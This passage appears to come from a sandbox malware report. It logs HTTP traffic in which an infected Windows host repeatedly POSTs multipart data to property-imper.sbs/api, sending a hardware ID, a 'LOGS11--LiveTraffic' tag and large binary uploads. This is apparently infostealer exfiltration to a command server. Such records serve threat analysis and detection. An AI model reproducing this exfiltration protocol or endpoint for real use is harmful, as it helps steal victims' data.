4d 65 64 38 37 76 6f 66 74 61 44 63 51 79 33 70 70 2b 4f 32 44 48 76 4f Data Ascii: ytb42f3P7kAkb0pLY8540j2wyKRodRCXejCy2IMc8fbKhJv17tTiByphEgd71hnZJ63KrC93V4k9KLy9gFGsuMzMqvLx3qEGZCESFHWXGc5t5ZTtaCkQy3ov/PCPEvr739S8/Ojaqj5UCl8GPoBe5hOczbMlNFfRGm/k/rAvw+nK1vjZ/c/uQCRvSktjznjSPbDIpGobV4U5KLy9ilGsuOjLt/rw3q8hYD9fBDzMed87voftaDcQy3pp+O2DHvO

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:12 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RHEPKVDM64 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12793 Host: property-imper.sbs
2024-11-24 02:04:12 UTC	12793	OUT	Data Raw: 2d 2d 52 48 45 50 4b 56 44 4d 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 32 44 36 41 45 36 41 46 43 38 30 30 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 52 48 45 50 4b 56 44 4d 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 48 45 50 4b 56 44 4d 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 52 48 45 50 4b 56 44 4d 36 34 0d 0a 43 6f Data Ascii: --RHEPKVDM64Content-Disposition: form-data; name="hwid"882D6AE6AFC8008FD7CBBD6DF28D3732--RHEPKVDM64Content-Disposition: form-data; name="pid"2--RHEPKVDM64Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--RHEPKVDM64Co
2024-11-24 02:04:13 UTC	1019	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lcq66gkehe953442t1fsqrvtbh; expires=Wed, 19-Mar-2025 19:50:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56X9BbhvS5phZ30l1nPAbHNlT%2FbqkcUyMoxK1%2BwXwiWIAA0iI5gJO3KfbWPX6u56uXEy0ps5yfo0AjbJ%2Fb%2BGglqYQTcNXg018uMzpdQGnXsKoSjtRr7QTykb7GjnY0XSENv9UjI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e75d3b2a93b0f65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1677&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13727&delivery_rate=1742243&cwnd=222&unsent_bytes=0&cid=e3fd1eca91b0a794&ts=883&x=0"
2024-11-24 02:04:13 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-24 02:04:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:14 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8ZOGK4M3O User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15029 Host: property-imper.sbs
2024-11-24 02:04:14 UTC	15029	OUT	Data Raw: 2d 2d 38 5a 4f 47 4b 34 4d 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 32 44 36 41 45 36 41 46 43 38 30 30 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 38 5a 4f 47 4b 34 4d 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 5a 4f 47 4b 34 4d 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 5a 4f 47 4b 34 4d 33 4f 0d 0a 43 6f 6e 74 65 6e Data Ascii: --8ZOGK4M3OContent-Disposition: form-data; name="hwid"882D6AE6AFC8008FD7CBBD6DF28D3732--8ZOGK4M3OContent-Disposition: form-data; name="pid"2--8ZOGK4M3OContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--8ZOGK4M3OConten
2024-11-24 02:04:15 UTC	1017	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5uhs0s12aijqpb1qdpvqbd9gok; expires=Wed, 19-Mar-2025 19:50:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCwCV6V3BNkKRIQPhiKorK7S8XY7NCvnTrrkuH6prILXAxfHU8mz%2FkQt%2BrSS%2Fzkjj75nbHo2isYBPRZ9M6C8Ar16KnUbbPIeRCITainzOsj01S6C2evK1SlmSLR3onINooWY6ZE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e75d3c1b8cd8cba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1792&sent=15&recv=20&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15962&delivery_rate=1566523&cwnd=229&unsent_bytes=0&cid=04a17ca46a8f32cc&ts=999&x=0"
2024-11-24 02:04:15 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-24 02:04:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:17 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3OB78JD93PBLOD3Q0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20567 Host: property-imper.sbs
2024-11-24 02:04:17 UTC	15331	OUT	Data Raw: 2d 2d 33 4f 42 37 38 4a 44 39 33 50 42 4c 4f 44 33 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 32 44 36 41 45 36 41 46 43 38 30 30 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 33 4f 42 37 38 4a 44 39 33 50 42 4c 4f 44 33 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 4f 42 37 38 4a 44 39 33 50 42 4c 4f 44 33 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --3OB78JD93PBLOD3Q0Content-Disposition: form-data; name="hwid"882D6AE6AFC8008FD7CBBD6DF28D3732--3OB78JD93PBLOD3Q0Content-Disposition: form-data; name="pid"3--3OB78JD93PBLOD3Q0Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-11-24 02:04:17 UTC	5236	OUT	Data Raw: 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
2024-11-24 02:04:18 UTC	1027	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=18i4pcsb8o9s7qs2929vm2op86; expires=Wed, 19-Mar-2025 19:50:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yjl%2Fu%2FNRXW%2B1NfuglB2tMelwvmwIkbj0mGZK2vNf3%2FmuXAIbEW%2Fr887lgknk2o0GhmkITc1y8HnPVVIRCczFl0yPCcQThGm9vDai8Ehl6cOatYBqE6H45bZ2mgy%2BMGC%2F4KYzI%2Fo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e75d3d0a9c48ce9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2073&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21530&delivery_rate=1594756&cwnd=252&unsent_bytes=0&cid=da23523c3771a183&ts=890&x=0"
2024-11-24 02:04:18 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-24 02:04:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:19 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CDHIRW41UMXQOYH9K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1237 Host: property-imper.sbs
2024-11-24 02:04:19 UTC	1237	OUT	Data Raw: 2d 2d 43 44 48 49 52 57 34 31 55 4d 58 51 4f 59 48 39 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 32 44 36 41 45 36 41 46 43 38 30 30 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 43 44 48 49 52 57 34 31 55 4d 58 51 4f 59 48 39 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 44 48 49 52 57 34 31 55 4d 58 51 4f 59 48 39 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --CDHIRW41UMXQOYH9KContent-Disposition: form-data; name="hwid"882D6AE6AFC8008FD7CBBD6DF28D3732--CDHIRW41UMXQOYH9KContent-Disposition: form-data; name="pid"1--CDHIRW41UMXQOYH9KContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-11-24 02:04:20 UTC	1018	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n1r76a25900a02ecdffgei7m6f; expires=Wed, 19-Mar-2025 19:50:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVexVZ57ZfTUmMmVS%2FALjDDXNn2CXX9ChRGVQJ2UGsLPt1H1q%2BxrmieBhuXiK9JBItlKyrVWfnmUW%2BklqzxIjtxeyrcbTWO7WMKDjmyS3dip6WCLo6BDHvxg4NQz%2F%2F8i7YnEhsM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e75d3e1ac429e04-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1834&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2155&delivery_rate=1545791&cwnd=234&unsent_bytes=0&cid=2b20d6e27ca46e97&ts=734&x=0"
2024-11-24 02:04:20 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-24 02:04:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:22 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SOCCTL0NPQNPYZGT0V User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570135 Host: property-imper.sbs
2024-11-24 02:04:22 UTC	15331	OUT	Data Raw: 2d 2d 53 4f 43 43 54 4c 30 4e 50 51 4e 50 59 5a 47 54 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 32 44 36 41 45 36 41 46 43 38 30 30 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 53 4f 43 43 54 4c 30 4e 50 51 4e 50 59 5a 47 54 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 4f 43 43 54 4c 30 4e 50 51 4e 50 59 5a 47 54 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 Data Ascii: --SOCCTL0NPQNPYZGT0VContent-Disposition: form-data; name="hwid"882D6AE6AFC8008FD7CBBD6DF28D3732--SOCCTL0NPQNPYZGT0VContent-Disposition: form-data; name="pid"1--SOCCTL0NPQNPYZGT0VContent-Disposition: form-data; name="lid"LOGS11--LiveT
2024-11-24 02:04:22 UTC	15331	OUT	Data Raw: b2 a0 ba 02 df fd 84 fe c0 02 4d 72 02 68 56 18 b8 0c 02 7f 95 56 0c 22 c1 0b 7b a9 da d9 56 62 75 ed ad 19 8b 74 7f de df 2f 04 c1 c7 df 95 e5 af d4 60 9c 87 07 f5 bc 25 7f c6 f8 7f 21 35 e9 cb 9e 9d 08 93 d2 fe 97 df fd 47 aa fd bc 7e b9 3f f7 e7 07 7a 55 78 20 bb 22 4d 77 16 5d 61 25 17 59 8d 3b ff 03 28 4d 8f ff df ed 26 ff f7 01 1e a2 03 70 66 8a 02 ad 04 42 bf 21 2c d8 f8 a0 7d 34 a3 26 13 14 c6 3b 89 5e 68 e8 b7 0b c9 7e cc fd 19 23 84 f4 a7 b2 5e a7 ed 08 00 a9 46 5a 30 3c 3e d8 0b 76 c6 40 8f bd 21 7d 57 f6 9e 9e e6 60 8c 3b ad 51 1e 77 7c d5 59 0e 75 b9 c2 b9 63 b7 6d de 02 6a 89 94 80 70 fb a8 44 61 a6 af 79 ec a1 76 4e 24 1d 9d c4 f5 ba 97 22 7a 84 73 bd 1d 05 81 df af 4c 27 f7 d3 1a a7 4f d1 b9 3d 3f a8 a1 ba 7d de c4 85 4d 9a e8 b9 31 b1 03 Data Ascii: MrhVV"{Vbut/`%!5G~?zUx "Mw]a%Y;(M&pfB!,}4&;^h~#^FZ0<>v@!}W`;Qw\|YucmjpDayvN$"zsL'O=?}M1
2024-11-24 02:04:22 UTC	15331	OUT	Data Raw: f2 46 b6 a7 33 97 ff d4 2d 58 b5 76 89 c2 5e b0 df 45 0a b0 10 00 77 a8 ea e1 f2 68 80 0f 31 e1 d1 4a bc 46 8e e8 5e 86 a7 d8 5c fb 48 e2 cf 94 2a 1b 51 99 79 1d ea 9c d5 08 36 47 71 d9 df 68 3b 37 84 3a 6f e8 87 a0 ef 12 7c 52 1d 2b d5 b0 f0 cb 88 f1 cc be 24 3c fb 79 85 bf 85 36 48 2b 0d b3 44 d0 f2 0a 11 80 ad 87 dd 19 14 66 3d 00 74 2b 83 ff 4d b2 73 c0 d2 0f 90 59 08 72 bf a4 1c 3c db 44 11 e4 ba 3d c9 ff 6f df 76 f9 54 f1 64 73 05 48 00 48 22 ef f9 dc e7 89 03 91 5d 1a 32 28 48 80 f5 41 5c 74 52 a4 03 38 ef 84 b3 14 47 a4 1d a0 43 a1 17 c0 c0 e3 6a a6 47 b1 45 c1 ab e6 fc 4b a7 ee cd c3 2e 18 ac c9 b6 dd 95 dd 57 10 37 d4 65 c0 03 cc d2 bd d1 c2 34 87 6c 54 b7 19 1c 13 34 1b 91 9e 32 a4 ed a8 62 2c e3 a3 de 7c 57 4d e8 38 5e e2 23 6e 08 1e 7c 98 89 Data Ascii: F3-Xv^Ewh1JF^\H*Qy6Gqh;7:o\|R+$<y6H+Df=t+MsYr<D=ovTdsHH"]2(HA\tR8GCjGEK.W7e4lT42b,\|WM8^#n\|
2024-11-24 02:04:22 UTC	15331	OUT	Data Raw: 96 0e 21 3c f6 1e 91 71 ed df 65 a0 6e 3b 87 8f 7c 54 5e cf 72 49 88 ff a5 81 d4 f0 19 44 c7 28 74 67 68 98 ad fe 92 b7 e3 25 5c 99 48 9d 48 b3 ac 51 4f 09 77 e9 74 1d bb b4 95 ec 2b d2 8e d1 f8 d3 87 25 76 73 3c 15 c4 8e a4 a6 b1 3c 6a 77 a7 7b 38 3b 45 ec 10 d9 b4 50 41 be aa 15 b9 7a 86 ae 8a da b1 27 35 31 59 9d 35 31 33 5f cd ca 64 90 27 1a d2 ff e2 c2 87 50 fd 89 df b6 ec 07 19 e9 32 e1 97 cb 04 ea 2b b7 98 eb 23 63 31 33 fc d4 76 c2 d7 86 b3 5f 37 3b be 68 ec bb 25 49 4b 5d 7a 95 96 1e 62 86 40 40 50 4c ac 4c 81 0d e2 c2 b5 05 14 39 0c 82 98 32 e0 2a 56 57 12 22 6a 69 14 a8 3f 34 b9 7e 7e d4 74 cf 51 d0 cb 8f 51 4d e5 98 e7 83 0c 0a f5 f2 0f d3 8a f0 af fa 39 a5 7f fa 1a ea dc fe 20 0f ba ea b0 1f d6 b3 9e ed 79 2f 06 2c af 00 4b 4c d9 47 40 95 5c Data Ascii: !<qen;\|T^rID(tgh%\HHQOwt+%vs<<jw{8;EPAz'51Y513_d'P2+#c13v_7;h%IK]zb@@PLL92*VW"ji?4~~tQQM9 y/,KLG@\
2024-11-24 02:04:22 UTC	15331	OUT	Data Raw: 11 cc 41 01 1e 14 74 8a 8f 7a bd 01 89 8b 78 03 c1 76 44 d5 67 29 72 66 48 5c 57 ab 2d 17 e0 e1 94 99 83 e4 9c 2a a9 5e de 35 76 90 02 1d 45 d1 fd f0 2a 21 1e 2f c3 57 92 87 af 33 a4 09 74 dd cc f7 67 46 5f 8d 36 63 c2 0a 6f ab 5c 7c 54 12 f1 19 ad 3b 39 8b cc 29 82 0b ff e0 43 a0 cb dd 3c 54 6c 6b 46 95 80 20 34 86 29 47 47 a0 c8 aa 88 9f 37 0b cc 03 8e 97 9c d6 68 0e f1 5b 8f b6 27 b7 da 74 7f 81 08 e8 fb e2 a0 e3 57 f6 1a 50 8e a6 dc 6b 75 75 a2 ad 74 ea 6a b8 6d f5 4d ab 3b 2b 98 a4 d7 e1 5b 78 a3 74 65 60 ab e2 5f 0a 61 40 20 17 b4 6b 83 81 e2 07 5d 33 dc 4d 0a ce 0a 40 7e 74 64 d0 46 e1 7b 0b 47 e9 d0 9b 7a ab 81 70 cf bf 93 19 f6 85 96 fc 1c 3b 70 fd 34 01 8b 76 5d e1 86 14 1c 48 80 14 8b 10 e1 47 ec fc dc 8f c1 60 6e c2 b5 05 75 68 29 2c 34 32 32 Data Ascii: AtzxvDg)rfH\W-^5vE!/W3tgF_6co\\|T;9)C<TlkF 4)GG7h['tWPkuutjmM;+[xte`_a@ k]3M@~tdF{Gzp;p4v]HG`nuh),422
2024-11-24 02:04:22 UTC	15331	OUT	Data Raw: 9f fb 29 7f 0a 65 06 bc 9d a3 82 af 3d 1a d5 18 20 71 f0 09 43 72 cd 5a 7f 9b 91 5d 02 71 94 f3 2c 35 ce 47 9a f1 ad 6d d4 d6 d4 2c b5 05 b5 4c b3 73 82 97 d2 a3 d2 05 26 1f 31 7e 56 23 fa ff 2c a5 2f a6 d2 ca 35 de 51 25 b4 94 6d eb 91 6d 56 67 a4 a2 e8 1a 25 f1 2b 8e fe b8 65 c5 3e d1 ca 4a 31 5b 69 20 21 5b 44 24 59 fa ed c4 d7 8f 85 2d bc 92 9f 8a 61 c0 ae d5 bc f5 ed 5e fa 2d ee 0b c7 c6 da 30 c6 f4 d6 b7 4a 78 1a d7 a1 0f 3b 71 3c 94 59 55 12 0f e5 ef ab 92 f8 1a 22 be b3 3f ff 29 54 67 ec 8c ab 7b df 4b f0 25 1d f5 dd ea 76 73 4e 93 7c b8 26 89 62 fc dd b2 f0 2d b8 62 cb 6e 83 99 63 19 22 3e 12 77 09 5c 19 4e 44 7d 24 5f 38 3d 91 a9 8e 87 66 63 46 6d 73 6a a2 b8 ee 11 29 1c 8d f3 2c 73 08 21 64 e4 40 9e c2 66 dd 45 65 40 58 1b ec fa 79 cb 90 9d e1 Data Ascii: )e= qCrZ]q,5Gm,Ls&1~V#,/5Q%mmVg%+e>J1[i ![D$Y-a^-0Jx;q<YU"?)Tg{K%vsN\|&b-bnc">w\ND}$_8=fcFmsj),s!d@fEe@Xy
2024-11-24 02:04:22 UTC	15331	OUT	Data Raw: 31 5a ed 53 6f df 34 d9 2c 99 a4 46 dd b4 78 b4 3a 3f 30 b3 ba 5d 5e b3 dd a7 9a c0 e8 e6 e6 33 44 3b ab 43 6e e0 80 59 b2 a1 a0 d8 0b 31 f0 23 2a 4b 25 6e 80 a1 05 22 a6 f6 96 9f c5 81 1d 22 28 d9 c0 ab 2d d9 c7 4d 65 ed e9 33 26 a4 bb 01 b6 95 ab d9 cb 79 fa 59 dc 15 d7 ed 97 97 21 b0 3e fb 37 ef ec 5f 44 a0 63 80 64 08 9d ee e4 9e 87 a3 09 9c c5 c7 b3 ed c4 93 23 a7 e7 28 9a b8 db 4b 6b e1 9d 92 17 ce 38 df cf b1 c0 8b 54 2e 2d df 0c e0 e7 dc 95 bb 2d 73 4c c8 ea cb 45 ad 65 67 ee d5 47 8d 9e 3a a3 9b c9 a1 83 3d 23 e8 42 eb 0b be b5 36 b9 e3 5b f2 0f 7a 16 3e 42 48 f1 1a 40 b1 c6 d7 7e 84 ec c7 c6 5a ea 34 30 0c ed 5a 01 db d0 59 e4 7f 97 20 c6 bb ec 5c 76 a4 8a 34 3c 96 d1 84 fb 1f e8 62 02 26 7e a4 e6 8c 13 7c 07 64 05 83 4b bb 91 80 20 da 1c b4 35 Data Ascii: 1ZSo4,Fx:?0]^3D;CnY1#*K%n""(-Me3&yY!>7_Dcd#(Kk8T.--sLEegG:=#B6[z>BH@~Z40ZY \v4<b&~\|dK 5
2024-11-24 02:04:22 UTC	15331	OUT	Data Raw: 81 a1 9b fb 33 79 0b f0 69 cf 3f 43 f2 96 bf 0b 13 99 68 58 00 c3 bf 28 83 ee 9a 98 9c 77 63 d9 0e c4 e8 2b 69 41 26 e2 7d a5 d3 e7 1b 5c 95 b3 e7 27 d2 4d 1c 14 2f 2b 3f d7 9f 57 eb 70 4b b0 ad 57 92 8f d0 bd 2c 9c c4 d3 84 fc 42 1b 09 db 5b 4e bb 4c 5a 26 8e 84 f7 e3 83 dc a1 ec ca 55 b5 f2 9f d8 e2 c7 91 63 f7 cd f4 23 78 a0 37 43 dd 23 23 aa f4 af 44 6e 66 50 e9 33 bf 3f 25 de df 22 33 54 83 de 48 92 e9 bd e2 82 dd bf 33 6d 25 de 9f 2e af a4 a7 08 92 7d 4e ff fe 73 37 04 04 3b fb f9 30 e0 91 72 e6 63 57 64 76 22 f5 f6 bc 26 bb 46 9c eb e9 5f f6 a4 ce bb e2 06 4f cb 61 f5 e8 2b 7d cb 63 a6 90 dd 71 77 fb eb dc 7f bf 57 3c 8e d2 e8 96 ac 13 84 f7 72 bc 19 2c 0c ee d6 aa 78 38 fe fc 56 76 98 71 a4 84 3e 6a b5 b6 16 69 33 e7 d6 7c 27 6f 2d 07 91 89 00 23 Data Ascii: 3yi?ChX(wc+iA&}\'M/+?WpKW,B[NLZ&Uc#x7C##DnfP3?%"3TH3m%.}Ns7;0rcWdv"&F_Oa+}cqwW<r,x8Vvq>ji3\|'o-#
2024-11-24 02:04:22 UTC	15331	OUT	Data Raw: bb 8b 90 76 1d bc e6 61 dd 10 eb a3 6b 7d 37 36 6b 34 f3 f8 03 5d 8f af 36 da c6 8e 32 1e 28 ca b7 d5 10 3d c6 0e e3 a2 55 bb 00 77 72 3e ea 24 1e 2e ba dd 31 57 cf b6 70 cf 4e c4 1d d8 29 8f 30 5f 61 5e e3 41 54 15 b2 f2 e5 cf 71 d2 48 29 84 c4 71 e1 2f e3 74 fd 13 c7 45 34 1c 61 d9 b9 ab 63 b6 11 84 d1 5a 01 ee 2d 60 f3 d5 58 02 20 38 6f 46 ad d1 16 04 d8 c5 5b 24 fb 78 e4 ef b5 93 b6 d9 e8 98 b5 70 3b b3 fa bb 18 4a da 06 26 66 7c 48 17 a3 d5 8a 48 48 22 b6 32 91 2c e4 ec cf bf 71 f2 c3 7c 1f bf 93 8f c7 46 99 51 98 cf c4 19 e7 b0 79 84 e2 b2 ad 44 e5 a5 af 93 9a ed 8d ab 8a 3a af 76 50 51 11 b7 a5 08 7d e1 ef 0e e3 3d 01 ec 2f 72 e8 68 2b 73 4a bf ed 67 2b e9 c9 2e 99 fb e6 2a 93 e7 7a 72 c9 